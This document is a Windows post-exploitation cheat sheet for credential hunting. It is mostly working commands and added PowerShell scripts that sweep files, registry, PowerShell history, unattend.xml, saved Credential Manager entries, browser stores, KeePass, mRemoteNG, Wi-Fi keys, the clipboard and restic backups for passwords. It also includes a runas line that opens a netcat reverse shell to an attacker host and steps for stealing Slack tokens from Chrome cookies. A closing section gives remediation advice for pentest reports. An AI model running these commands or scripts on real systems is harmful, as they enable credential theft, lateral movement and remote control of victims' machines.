🛡️ Methodology Checklist
- Filesystem search: findstr /SIM /C:"password" *.txt *.xml *.ini *.config 2>nul
- PowerShell history: (Get-PSReadLineOption).HistorySavePath, then read the file
- Credential Manager: cmdkey /list; if entries exist: runas /savecred /user:[USER] cmd
- Chrome custom dictionary: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Custom Dictionary.txt
- KeePass databases: Get-ChildItem -Recurse -Filter *.kdbx -ErrorAction SilentlyContinue
- KeePass hash: keepass2john database.kdbx > hash.txt; hashcat -m 13400 hash.txt [wordlist] (mode 13400 covers AES-KDF databases; KDBX 4 files keyed with Argon2 are not supported by it)
- mRemoteNG: %APPDATA%\mRemoteNG\confCons.xml, default key: mR3m
- Run LaZagne: LaZagne.exe all
🎯 Operational Context
Use when: Windows shell obtained — hunt credentials in registry, PowerShell history, web.config, unattend.xml, SAM, credential manager, and sticky notes.
Think Dumber First: run these two immediately: type C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt and reg query HKLM /f password /t REG_SZ /s (then the same against HKCU). PowerShell history is frequently the single highest-yield credential source on Windows workstations.
Skip when: Already have SYSTEM: dump LSASS directly instead of hunting files. Still sweep files and history when you need credentials LSASS never held, such as database strings in web.config, deployment accounts in unattend.xml, or mRemoteNG sessions to other hosts.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Recursive file-based password search |
| (Get-PSReadLineOption).HistorySavePath | Get PowerShell command history file path |
| type [HISTORY_PATH]\ConsoleHost_history.txt | Read PowerShell history; often contains plaintext creds |
| $Credential = Import-Clixml -Path C:\[PATH]\creds.xml; $Credential.GetNetworkCredential().Password | Decrypt PSCredential XML if you own the same user (DPAPI, user scope) |
| cmdkey /list | Saved Windows credentials; check for admin/service accounts |
| runas /savecred /user:[DOMAIN]\[USER] cmd.exe | Use a saved Domain:interactive credential without knowing the password |
| .\SharpChrome.exe logins | Decrypt Chrome saved passwords (requires same user context) |
| keepass2john Database.kdbx > hash.txt | Extract KeePass hash for cracking |
| hashcat -a 0 -m 13400 hash.txt rockyou.txt | Crack KeePass hash (AES-KDF databases) |
| .\LaZagne.exe all | LaZagne; dump creds from all installed applications |
| Import-Module .\SessionGopher.ps1; Invoke-SessionGopher -Thorough | SessionGopher; extract PuTTY/WinSCP/RDP saved sessions |
| reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | AutoLogon credentials in registry (DefaultPassword) |
| netsh wlan show profile name="[SSID]" key=clear | View Wi-Fi password in cleartext |
| python3 mremoteng_decrypt.py -s [ENCRYPTED_STRING] | Decrypt mRemoteNG saved passwords (default key: mR3m) |
| Import-Module .\Invoke-ClipboardLogger.ps1; Invoke-ClipboardLogger | Monitor clipboard for credential paste events |
🔬 Deep Dive & Workflow
File-Based Credential Search
# Recursive search across common file types (/S subdirectories, /I case-insensitive, /M print matching file names only)
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
# Specific directories (2>nul hides access-denied noise)
# IIS web.config
findstr /SIM /C:"password" C:\inetpub\*.config 2>nul
# XAMPP configs
findstr /SIM /C:"password" C:\xampp\*.ini 2>nul
# User files: findstr does not expand * inside directory names, so give it the parent and let /S recurse
findstr /SIM /C:"password" C:\Users\*.txt 2>nul
# Chrome custom spell-check dictionary: users add words the browser keeps underlining, sometimes their passwords
gc 'C:\Users\[USER]\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
# Unattend files (post-imaging credentials); when <PlainText>false</PlainText>, <Value> is Base64 of the UTF-16LE password with "Password" appended
C:\unattend.xml
C:\Windows\Panther\unattend.xml
C:\Windows\system32\sysprep\unattend.xml
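Decoding the answer-file passwords listed above, as an added PowerShell example that is not from the original page: it parses unattend/sysprep XML, handles the Base64 form Windows writes when PlainText is false, and sweeps the usual answer-file locations. The path list is an assumed set of common locations, not an exhaustive one, and the sample answer file at the bottom is constructed for this example.

```powershell
# Added example, not from the original page. Decodes credentials from unattend/sysprep answer files.
# Assumptions: the answer-file paths below are the usual locations, not an exhaustive list;
# the sample XML at the bottom is constructed.

function ConvertFrom-UnattendPassword {
    param([Parameter(Mandatory)][string]$Value, [bool]$PlainText)
    if ($PlainText) { return $Value }
    # With <PlainText>false</PlainText> Windows stores Base64(UTF-16LE(password + "Password"))
    $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value))
    if ($decoded.EndsWith('Password')) { $decoded = $decoded.Substring(0, $decoded.Length - 8) }
    return $decoded
}

function Get-UnattendCredential {
    param([Parameter(Mandatory)][xml]$Xml, [string]$Source = '<inline>')
    # Password blocks live under AutoLogon, LocalAccount and UserAccounts/AdministratorPassword.
    # local-name() sidesteps the urn:schemas-microsoft-com:unattend default namespace.
    $nodes = $Xml.SelectNodes("//*[local-name()='Password' or local-name()='AdministratorPassword']")
    foreach ($n in $nodes) {
        $valueNode = $n.SelectSingleNode("*[local-name()='Value']")
        if (-not $valueNode) { continue }
        $plainNode = $n.SelectSingleNode("*[local-name()='PlainText']")
        # A missing <PlainText> element means the value is literal
        $isPlain = (-not $plainNode) -or ($plainNode.InnerText.Trim() -eq 'true')
        if ($n.LocalName -eq 'AdministratorPassword') {
            $context = 'AdministratorPassword'
            $user = 'Administrator'
        } else {
            $context = $n.ParentNode.LocalName
            # AutoLogon names the account in <Username>, LocalAccount in <Name>
            $userNode = $n.ParentNode.SelectSingleNode("*[local-name()='Username' or local-name()='Name']")
            $user = if ($userNode) { $userNode.InnerText } else { '(unknown)' }
        }
        [pscustomobject]@{
            Source   = $Source
            Context  = $context
            User     = $user
            Password = ConvertFrom-UnattendPassword -Value $valueNode.InnerText -PlainText $isPlain
        }
    }
}

# Sweep the usual answer-file locations on the box (assumed list)
$answerFiles = 'C:\unattend.xml', 'C:\sysprep.xml',
               'C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml',
               'C:\Windows\System32\sysprep\unattend.xml', 'C:\Windows\System32\sysprep\sysprep.xml'
foreach ($f in $answerFiles) {
    if (Test-Path $f) { Get-UnattendCredential -Xml ([xml](Get-Content -Raw $f)) -Source $f }
}

# Constructed sample answer file so the decoder can be exercised without a real one
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Summer2024!' + 'Password'))
[xml]$sample = @"
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>$encoded</Value><PlainText>false</PlainText></Password>
        <Username>deploy_admin</Username>
        <Enabled>true</Enabled>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>Winter2023!</Value><PlainText>true</PlainText></AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"@
Get-UnattendCredential -Xml $sample -Source 'sample.xml' | Format-Table -AutoSize
```

The XPath uses local-name() so the same function works whether or not the file declares the unattend namespace; the "Password" suffix is what the trailing eight-character strip removes.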
PowerShell History
# Find history path (PSReadLine default; one file per user and host)
(Get-PSReadLineOption).HistorySavePath
# → C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Read it
type "C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Search for patterns (Select-String is .NET regex: a bare | is alternation, \| would match a literal pipe)
gc "...\ConsoleHost_history.txt" | Select-String "password|cred|securestring|-pass"
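A sweep over every reachable user's history file, as an added PowerShell example that is not from the original page: it collects each profile's PSReadLine history (all of them from an admin shell, only your own otherwise), greps with a correctly formed .NET alternation, and returns file/line/command objects. The keyword list is an assumed starting point, and the sample history written to %TEMP% is constructed.

```powershell
# Added example, not from the original page. Sweeps PSReadLine history files for credential-looking lines.
# Assumptions: the keyword list is a starting point, not exhaustive; the sample history file is constructed.

function Find-PSHistoryCredential {
    param(
        [string[]]$Path = @(),
        # .NET regex: a bare | is alternation (grep-style \| would match a literal pipe); Select-String is case-insensitive
        [string]$Pattern = 'password|passwd|pwd|cred|securestring|-AsPlainText|/user:|apikey|token|bearer|secret'
    )
    if ($Path.Count -eq 0) {
        # Every profile's PSReadLine directory; an unprivileged shell can only read its own profile
        $Path = @(Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\*_history.txt' -ErrorAction SilentlyContinue |
                  Select-Object -ExpandProperty FullName)
        # The current session may save elsewhere; Get-PSReadLineOption throws when PSReadLine is not loaded
        try { $own = (Get-PSReadLineOption).HistorySavePath } catch { $own = $null }
        if ($own -and (Test-Path $own)) { $Path += $own }
    }
    foreach ($file in ($Path | Sort-Object -Unique)) {
        Select-String -Path $file -Pattern $Pattern -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{ File = $file; Line = $_.LineNumber; Command = $_.Line.Trim() }
        }
    }
}

# Constructed sample history (not real loot) to show what the sweep returns
$sampleHistory = Join-Path $env:TEMP 'ConsoleHost_history.sample.txt'
@'
Get-ChildItem C:\scripts
net use \\fs01\backup /user:CORP\svc_backup B@ckup2024!
$p = ConvertTo-SecureString 'Sp1ngR0ll!' -AsPlainText -Force
Invoke-RestMethod https://api.corp.local/v1 -Headers @{ Authorization = 'Bearer sample-token-value' }
Get-Process
'@ | Set-Content -Path $sampleHistory
Find-PSHistoryCredential -Path $sampleHistory | Format-Table -AutoSize

# Live sweep of the box
Find-PSHistoryCredential | Format-Table -AutoSize
```

The `*_history.txt` wildcard also picks up history written by other hosts (for example the VS Code host), which PSReadLine names after the host in the same directory.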
PSCredential CLIXML Decrypt
# Export-Clixml protects the password with DPAPI in user scope: it only decrypts as the same user
# on the same machine (or with that user's DPAPI master key), so run this from that user's shell
$Credential = Import-Clixml -Path "C:\scripts\creds.xml"
$Credential.GetNetworkCredential().UserName
$Credential.GetNetworkCredential().Password
# One-liner from that user's shell:
(Import-Clixml C:\creds.xml).GetNetworkCredential().Password
Saved Credentials (cmdkey + runas)
# List saved creds
cmdkey /list
# → Target: Domain:interactive=SERVER\Administrator
# → Type: Domain Password
# → User: SERVER\Administrator
# Use a saved Domain:interactive credential without knowing the password
# (/savecred needs an entry for that user; it is unavailable on Home editions and can be disabled by policy)
runas /savecred /user:DOMAIN\Administrator "cmd.exe /c whoami > C:\temp\out.txt"
runas /savecred /user:SERVER\Administrator "cmd.exe /c nc.exe [LHOST] [LPORT] -e cmd.exe"
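Parsing cmdkey /list into objects, as an added PowerShell example that is not from the original page: runas /savecred only uses entries whose target begins with Domain:interactive=, so the parser flags those and leaves TERMSRV/ and generic entries for other tools. The sample listing is constructed; the output-line format it parses (Target/Type/User) is the one cmdkey prints.

```powershell
# Added example, not from the original page. Parses `cmdkey /list` output into objects and flags the
# Domain:interactive entries that runas /savecred can use. The sample listing below is constructed.

function ConvertFrom-CmdKeyList {
    param([Parameter(Mandatory)][string[]]$Text)
    $entries = New-Object System.Collections.Generic.List[object]
    foreach ($line in $Text) {
        $t = $line.Trim()
        if ($t -match '^Target:\s*(.+)$') {
            $entries.Add([pscustomobject]@{ Target = $Matches[1]; Type = $null; User = $null })
        } elseif ($entries.Count -gt 0 -and $t -match '^Type:\s*(.+)$') {
            $entries[$entries.Count - 1].Type = $Matches[1]
        } elseif ($entries.Count -gt 0 -and $t -match '^User:\s*(.+)$') {
            $entries[$entries.Count - 1].User = $Matches[1]
        }
    }
    foreach ($e in $entries) {
        # runas /savecred looks up Domain:interactive credentials; TERMSRV/ entries belong to mstsc,
        # generic entries to whatever application stored them
        $e | Add-Member -NotePropertyName RunAsUsable -NotePropertyValue ($e.Target -like 'Domain:interactive=*') -PassThru
    }
}

# Constructed sample of cmdkey /list output
$sampleListing = @'
Currently stored credentials:

    Target: Domain:interactive=CORP\svc_deploy
    Type: Domain Password
    User: CORP\svc_deploy

    Target: LegacyGeneric:target=TERMSRV/fs01.corp.local
    Type: Generic
    User: CORP\jdoe
    Local machine persistence
'@ -split "`r?`n"
ConvertFrom-CmdKeyList -Text $sampleListing | Format-Table -AutoSize

# Live: parse real entries and print a runas command for each usable one (run it to test the credential)
ConvertFrom-CmdKeyList -Text (cmdkey /list) | Where-Object RunAsUsable | ForEach-Object {
    'runas /savecred /user:{0} "cmd.exe /c whoami > C:\temp\out_{1}.txt"' -f $_.User, ($_.User -replace '[\\/:]', '_')
}
```

The TERMSRV/ entries are still worth noting: they are RDP credentials mstsc will replay, just not through runas.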
Browser Credentials
# Chrome (requires user context; Login Data is protected with DPAPI)
.\SharpChrome.exe logins
# → dumps username, URL, plaintext password
# Firefox (logins.json + key4.db in the profile; portable off-box)
# Copy profile dir and decrypt with firefox_decrypt.py on Kali
Copy-Item -Recurse "$env:APPDATA\Mozilla\Firefox\Profiles" C:\temp\ffprofiles
# → on Kali: python3 firefox_decrypt.py ffprofiles/[PROFILE]
# Steal Slack token via Chrome cookies
# Copy the cookies DB:
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" C:\temp\cookies.db
# → sqlite3 + DPAPI decrypt → Slack token for org access
# Cookie values are AES-GCM encrypted with a key from "User Data\Local State" that is itself DPAPI-protected
# (same user context needed); recent Chrome versions additionally bind cookie keys to the browser
# (App-Bound Encryption), which needs SYSTEM-level access to unwrap
AutoLogon Registry Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for:
# DefaultUserName = [USER]
# DefaultPassword = [PASS] ← plaintext!
# DefaultDomainName = [DOMAIN]
# (AutoAdminLogon = 1 confirms the automatic logon is active)
mRemoteNG Saved Passwords
# Config file location (default)
C:\Users\[USER]\AppData\Roaming\mRemoteNG\confCons.xml
# Contains encrypted passwords with default key "mR3m"
# Decrypt with:
python3 mremoteng_decrypt.py -s "[ENCRYPTED_STRING_FROM_XML]"
# → -k [CUSTOM_KEY] if mRemoteNG configured with custom master password
# Find all encrypted strings:
Select-String -Path confCons.xml -Pattern "Password="
LaZagne — Application Credential Dump
# Dump all application credentials
.\LaZagne.exe all
# Specific categories (module names as LaZagne spells them)
.\LaZagne.exe windows    # LSA secrets, cached creds, Credential Manager
.\LaZagne.exe browsers   # Chrome, Firefox, IE
.\LaZagne.exe sysadmin   # WinSCP, FileZilla, PuTTY
.\LaZagne.exe databases  # SQLite, MySQL config files
.\LaZagne.exe git        # Git credentials
.\LaZagne.exe mails      # Thunderbird, Outlook
Wi-Fi Credentials
# List saved profiles
netsh wlan show profiles
# Show password for specific profile
netsh wlan show profile name="[SSID]" key=clear
# → Key Content: [PLAINTEXT_PASSPHRASE]
Clipboard Monitoring
# Run the clipboard logger and wait for the user to paste credentials
Import-Module .\Invoke-ClipboardLogger.ps1
Invoke-ClipboardLogger
# → Logs clipboard every second; catches password-manager pastes
Restic Backup Repository Attack
# Find restic repos on system or network: restic encrypts the top-level config file, so grep
# for the repository layout (config beside data\, index\, keys\, snapshots\) rather than its contents
Get-ChildItem -Path C:\ -Recurse -Directory -Filter keys -ErrorAction SilentlyContinue |
    Where-Object { Test-Path (Join-Path $_.Parent.FullName 'config') }
# Files under keys\ are plaintext JSON naming the creating host and user (hostname, username, created)
# If you have the repo password (prompted, or via $env:RESTIC_PASSWORD):
restic -r [REPO_PATH] snapshots
restic -r [REPO_PATH] restore latest --target C:\temp\restore
# Backups may contain SAM, SYSTEM, NTDS.dit, credential files
# Even partial restores of sensitive dirs are valuable
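Finding restic repositories by layout and reading their key files, as an added PowerShell example that is not from the original page: restic encrypts the top-level config, so the finder looks for the directory shape instead and then parses the plaintext JSON under keys\, which names the host and account that created each key and the scrypt parameters you would be cracking against. The sample repository created in %TEMP% is constructed.

```powershell
# Added example, not from the original page. Finds restic repositories by directory layout and
# reads the plaintext key-file metadata. The sample repository created in %TEMP% is constructed.

function Find-ResticRepo {
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -Path $Root -Recurse -Directory -Filter keys -ErrorAction SilentlyContinue | ForEach-Object {
        $keysDir = $_.FullName
        $repo = $_.Parent.FullName
        # restic layout: an (encrypted) config file next to data\, index\, keys\, snapshots\
        $looksLikeRepo = (Test-Path (Join-Path $repo 'config') -PathType Leaf) -and
                         (Test-Path (Join-Path $repo 'snapshots') -PathType Container) -and
                         (Test-Path (Join-Path $repo 'data') -PathType Container)
        if (-not $looksLikeRepo) { return }
        # Each key file is plaintext JSON: who created it, when, and the scrypt parameters wrapping the master key
        $keys = @(Get-ChildItem -Path $keysDir -File -ErrorAction SilentlyContinue | ForEach-Object {
            try { Get-Content -Raw -Path $_.FullName | ConvertFrom-Json } catch { $null }
        } | Where-Object { $_ -ne $null })
        [pscustomobject]@{
            Repo     = $repo
            KeyCount = $keys.Count
            Creators = ($keys | ForEach-Object { '{0}@{1} ({2})' -f $_.username, $_.hostname, $_.created }) -join '; '
            Kdf      = ($keys | ForEach-Object { '{0} N={1} r={2} p={3}' -f $_.kdf, $_.N, $_.r, $_.p } | Select-Object -Unique) -join '; '
        }
    }
}

# Constructed sample repository
$sampleRepo = Join-Path $env:TEMP 'restic-sample'
foreach ($d in 'data', 'index', 'keys', 'locks', 'snapshots') {
    New-Item -ItemType Directory -Force -Path (Join-Path $sampleRepo $d) | Out-Null
}
Set-Content -Path (Join-Path $sampleRepo 'config') -Value 'opaque-encrypted-config-placeholder'
$sampleKey = '{"created":"2024-03-02T21:14:09Z","username":"backup","hostname":"fs01","kdf":"scrypt","N":32768,"r":8,"p":5,"salt":"c2FsdA==","data":"ZGF0YQ=="}'
Set-Content -Path (Join-Path $sampleRepo 'keys\4f1b2c3d') -Value $sampleKey
Find-ResticRepo -Root $sampleRepo | Format-List

# Live: sweep the drive, then use a recovered password without the interactive prompt
# Find-ResticRepo -Root 'C:\' | Format-List
# $env:RESTIC_PASSWORD = '<recovered password>'
# restic -r <repo> snapshots
# restic -r <repo> restore latest --target C:\temp\restore
```

The username/hostname pair in each key file tells you whose workstation or backup account unlocked the repository, which is a strong hint about where its password lives (a scheduled task, a service config, or a history file on that host).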
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PowerShell history empty | PSReadLine not loaded in this session (common in non-interactive shells), history saving disabled, or history cleared | Get-PSReadLineOption only works where PSReadLine is loaded; fall back to %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ for each user and check every *_history.txt there (other hosts, e.g. VS Code, write their own) |
| reg query too slow | Large registry | Focus: HKLM\SOFTWARE\, HKCU\SOFTWARE\, and HKLM\SYSTEM\ for stored passwords |
| unattend.xml not found | Not a freshly imaged system | Check all: dir /s /b C:\unattend.xml C:\sysprep.xml C:\Windows\Panther\unattend.xml |
| LaZagne not running | AV blocks execution | Use manual checks instead; LaZagne is commonly flagged; extract individual browser stores manually |
| Sticky notes not accessible | Locked database | Path: %LOCALAPPDATA%\Packages\Microsoft.MicrosoftStickyNotes_*\LocalState\plum.sqlite — use SQLite reader |
📝 Reporting Trigger
Finding Title: Credentials Found in Windows System Files and Registry
Impact: Plaintext credentials stored in PowerShell history, unattend.xml, web.config, or the Windows registry allow privilege escalation or lateral movement without further exploitation, giving authenticated access to additional systems.
Root Cause: Credentials stored in plaintext in accessible locations because of poor secrets management. Automated deployment scripts write credentials into unattend.xml without post-deployment cleanup.
Recommendation: Implement secrets management (Azure Key Vault, CyberArk). Remove unattend.xml after deployment. Disable or clear PSReadLine history on shared and sensitive systems (Set-PSReadLineOption -HistorySaveStyle SaveNothing). Restrict web.config access. Remove plaintext AutoLogon passwords from the Winlogon registry key. Use LAPS for local admin passwords.